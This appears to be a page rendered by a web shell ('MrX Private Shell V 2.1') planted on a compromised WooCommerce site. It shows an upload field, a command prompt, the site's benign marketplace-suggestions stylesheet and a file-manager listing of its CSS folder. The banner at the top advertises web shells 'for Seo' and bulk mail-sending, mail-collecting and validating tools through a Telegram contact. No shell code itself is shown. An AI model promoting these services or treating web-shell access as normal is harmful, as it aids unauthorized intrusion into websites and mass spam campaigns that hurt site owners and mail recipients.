__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
/**
 * marketplace-suggestions.scss
 * Styling for in-product marketplace suggestions.
 */

@import "mixins";
@import "variables";

$suggestions-pale-gray: #ddd;
$suggestions-metabox-pale-gray: #eee;

$suggestions-copy-text: #444;

a.suggestion-dismiss {
	border: none;
	box-shadow: none;
	color: $suggestions-pale-gray;
}

a.suggestion-dismiss:hover {
	color: #aaa;
}

a.suggestion-dismiss::before {

	@include iconbeforedashicons( "\f335" );

	font-size: 1.5em;
}

#woocommerce-product-data ul.wc-tabs li.marketplace-suggestions_tab {

	@media screen and (max-width: 600px) {
		// We hide the suggestions on mobile, so should hide the tab too.
		display: none;
	}

	a::before {

		@include iconbeforedashicons( "\f106" );

		@media only screen and (max-width: 900px) {
			line-height: 40px;
		}
	}

	a span {
		margin: 0 0.618em;
	}
}

.marketplace-suggestions-metabox-nosuggestions-placeholder {
	max-width: 325px;
	margin: 2em auto;
	text-align: center;

	.marketplace-suggestion-placeholder-content {
		margin-bottom: 1em;
	}

	h4,
	a,
	p {
		margin: auto;
		text-align: center;
		display: block;
		margin-top: 0.75em;
		line-height: 1.75;
	}
}

.marketplace-suggestions-container.showing-suggestion {
	text-align: left;

	.marketplace-suggestion-container {
		align-items: flex-start;
		display: flex;
		flex-direction: column;

		// Allows us to position the dismiss x button
		// relative to container on mobile.
		position: relative;

		img.marketplace-suggestion-icon {
			height: 40px;
			margin: 0;
			margin-right: 1.5em;
			flex: 0 0 40px;
		}

		.marketplace-suggestion-container-content {
			flex: 1 1 60%;

			h4 {
				margin: 0;
			}

			p {
				margin: 0;
				margin-top: 4px;
				color: $suggestions-copy-text;
			}
		}

		.marketplace-suggestion-container-cta {
			flex: 1 1 30%;
			min-width: 160px;
			text-align: right;
			white-space: nowrap;

			.suggestion-dismiss {
				text-decoration: none;
				position: absolute;
				top: 1em;
				right: 1em;
			}
		}
	}

	@media screen and (min-width: 600px) {

		.marketplace-suggestion-container {
			align-items: center;
			flex-direction: row;

			img.marketplace-suggestion-icon {
				// display: inline-block;
			}
		}
	}
}

.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="products-list-empty-header"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="products-list-empty-footer"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="product-edit-meta-tab-header"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="product-edit-meta-tab-footer"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="orders-list-empty-header"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="orders-list-empty-footer"] {

	.marketplace-suggestion-container {

		.marketplace-suggestion-container-content {

			h4 {
				font-size: 1.1em;
				margin: 0;
				margin-bottom: 0;
			}
		}
	}
}

// Additional breathing space margin under empty-state footer.
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="products-list-empty-footer"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="orders-list-empty-footer"] {

	margin-bottom: 6em;
}


// Optimise footer suggestion layout for left-aligned CTA link button only.
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="products-list-empty-footer"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="product-edit-meta-tab-footer"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="orders-list-empty-footer"] {

	.marketplace-suggestion-container {

		flex-direction: row-reverse;

		.marketplace-suggestion-container-cta {

			text-align: left;
		}

		.marketplace-suggestion-container-content.has-manage-link {
			text-align: right;
		}
	}
}


.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="product-edit-meta-tab-header"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="product-edit-meta-tab-footer"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="product-edit-meta-tab-body"] {

	.marketplace-suggestion-container {
		padding: 1em 1.5em;

		.marketplace-suggestion-container-content {

			p {
				padding: 0;
				line-height: 1.5;
			}
		}
	}
}

.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="products-list-empty-header"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="products-list-empty-footer"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="orders-list-empty-header"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="orders-list-empty-footer"] {

	.marketplace-suggestion-container {
		padding: 1.5em;
	}
}

.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="products-list-empty-body"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="orders-list-empty-body"] {

	.marketplace-suggestion-container {
		padding: 0.75em 1.5em;

		&:first-child {
			padding-top: 1.5em;
		}

		&:last-child {
			padding-bottom: 1.5em;
		}

		.marketplace-suggestion-container-content {

			p:last-child {
				margin-bottom: 0;
			}
		}
	}
}

.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="products-list-empty-header"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="products-list-empty-footer"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="products-list-empty-body"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="orders-list-empty-header"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="orders-list-empty-footer"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="orders-list-empty-body"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="product-edit-meta-tab-header"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="product-edit-meta-tab-footer"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="product-edit-meta-tab-body"] {

	// hide by default (mobile first)
	display: none;

	.marketplace-suggestion-container .marketplace-suggestion-container-cta {

		a.button {
			display: inline-block;
			min-width: 120px;
			text-align: center;
			margin: 0;
		}

		a.linkout {
			font-size: 1.1em;
			text-decoration: none;
		}

		a.linkout .dashicons {
			margin-left: 4px;
			bottom: 2px;
			position: relative;
		}

		.suggestion-dismiss {
			position: relative;
			top: 5px;
			right: auto;
			margin-left: 1em;
		}
	}

	@media screen and (min-width: 600px) {

		// Display onboarding table suggestion on desktop only. (for now)
		// There's limited room on mobile, and there are edge-case
		// styling issues in some browsers.
		display: block;
	}
}


.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="product-edit-meta-tab-header"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="product-edit-meta-tab-footer"] {

	border: none;
}

.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="product-edit-meta-tab-body"] {

	border: none;
	border-top: 1px solid $suggestions-metabox-pale-gray;
	border-bottom: 1px solid $suggestions-metabox-pale-gray;
}

.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="products-list-empty-header"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="products-list-empty-footer"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="products-list-empty-body"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="orders-list-empty-header"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="orders-list-empty-footer"],
.marketplace-suggestions-container.showing-suggestion[data-marketplace-suggestions-context="orders-list-empty-body"] {

	border: 1px solid $suggestions-pale-gray;
	border-bottom: none;

	&:last-child {
		border-bottom: 1px solid $suggestions-pale-gray;
	}
}

Filemanager

Name Type Size Permission Actions
jquery-ui Folder 0775
photoswipe Folder 0775
_animation.scss File 123 B 0664
_fonts.scss File 560 B 0664
_mixins.scss File 6.64 KB 0664
_variables.scss File 1.87 KB 0664
activation-rtl.css File 981 B 0664
activation.css File 980 B 0664
activation.scss File 893 B 0664
address-autocomplete-rtl.css File 2.8 KB 0664
address-autocomplete.css File 2.8 KB 0664
address-autocomplete.scss File 2.77 KB 0664
admin-rtl.css File 353.08 KB 0664
admin.css File 352.97 KB 0664
admin.scss File 140.15 KB 0664
auth-rtl.css File 2.5 KB 0664
auth.css File 2.5 KB 0664
auth.scss File 2.04 KB 0664
brands-admin-rtl.css File 61 B 0664
brands-admin.css File 61 B 0664
brands-admin.scss File 68 B 0664
brands-rtl.css File 2.23 KB 0664
brands.css File 2.23 KB 0664
brands.scss File 3.07 KB 0664
coming-soon-entire-site-deprecated-rtl.css File 2.79 KB 0664
coming-soon-entire-site-deprecated.css File 2.79 KB 0664
coming-soon-entire-site-deprecated.scss File 2.57 KB 0664
coming-soon-rtl.css File 989 B 0664
coming-soon.css File 990 B 0664
coming-soon.scss File 1.11 KB 0664
dashboard-rtl.css File 4.97 KB 0664
dashboard-setup-rtl.css File 661 B 0664
dashboard-setup.css File 660 B 0664
dashboard-setup.scss File 736 B 0664
dashboard.css File 4.97 KB 0664
dashboard.scss File 3.91 KB 0664
forms-rtl.css File 4.93 KB 0664
forms.css File 4.92 KB 0664
forms.scss File 4.84 KB 0664
helper-rtl.css File 16.49 KB 0664
helper.css File 16.49 KB 0664
helper.scss File 16.52 KB 0664
marketplace-suggestions-rtl.css File 20.84 KB 0664
marketplace-suggestions.css File 20.84 KB 0664
marketplace-suggestions.scss File 8.69 KB 0664
menu-rtl.css File 4.8 KB 0664
menu.css File 4.8 KB 0664
menu.scss File 2.74 KB 0664
network-order-widget-rtl.css File 2.32 KB 0664
network-order-widget.css File 2.32 KB 0664
network-order-widget.scss File 1.46 KB 0664
prettyPhoto-rtl.css File 8.96 KB 0664
prettyPhoto.css File 8.95 KB 0664
prettyPhoto.scss File 7.84 KB 0664
privacy-rtl.css File 1.61 KB 0664
privacy.css File 1.61 KB 0664
privacy.scss File 1.98 KB 0664
reports-print-rtl.css File 1.25 KB 0664
reports-print.css File 1.24 KB 0664
reports-print.scss File 1.51 KB 0664
select2.css File 14.28 KB 0664
select2.scss File 16.37 KB 0664
twenty-nineteen-rtl.css File 26.13 KB 0664
twenty-nineteen.css File 26.12 KB 0664
twenty-nineteen.scss File 18.59 KB 0664
twenty-seventeen-rtl.css File 23.75 KB 0664
twenty-seventeen.css File 23.73 KB 0664
twenty-seventeen.scss File 16.56 KB 0664
twenty-twenty-one-admin-rtl.css File 107 B 0664
twenty-twenty-one-admin.css File 107 B 0664
twenty-twenty-one-admin.scss File 172 B 0664
twenty-twenty-one-rtl.css File 56.47 KB 0664
twenty-twenty-one.css File 56.45 KB 0664
twenty-twenty-one.scss File 40.71 KB 0664
twenty-twenty-rtl.css File 44.98 KB 0664
twenty-twenty-three-rtl.css File 33.61 KB 0664
twenty-twenty-three.css File 33.58 KB 0664
twenty-twenty-three.scss File 19.79 KB 0664
twenty-twenty-two-rtl.css File 38.18 KB 0664
twenty-twenty-two.css File 38.15 KB 0664
twenty-twenty-two.scss File 19.99 KB 0664
twenty-twenty.css File 44.96 KB 0664
twenty-twenty.scss File 31.65 KB 0664
wc-setup-rtl.css File 28.92 KB 0664
wc-setup.css File 28.9 KB 0664
wc-setup.scss File 24.07 KB 0664
woocommerce-blocktheme-rtl.css File 9.65 KB 0664
woocommerce-blocktheme.css File 9.64 KB 0664
woocommerce-blocktheme.scss File 9.64 KB 0664
woocommerce-classictheme-editor-fonts-rtl.css File 446 B 0664
woocommerce-classictheme-editor-fonts.css File 446 B 0664
woocommerce-classictheme-editor-fonts.scss File 585 B 0664
woocommerce-layout-rtl.css File 19.27 KB 0664
woocommerce-layout.css File 19.26 KB 0664
woocommerce-layout.scss File 9.84 KB 0664
woocommerce-rtl.css File 84.42 KB 0664
woocommerce-smallscreen-rtl.css File 7.36 KB 0664
woocommerce-smallscreen.css File 7.35 KB 0664
woocommerce-smallscreen.scss File 3.14 KB 0664
woocommerce.css File 84.35 KB 0664
woocommerce.scss File 36.69 KB 0664
Filemanager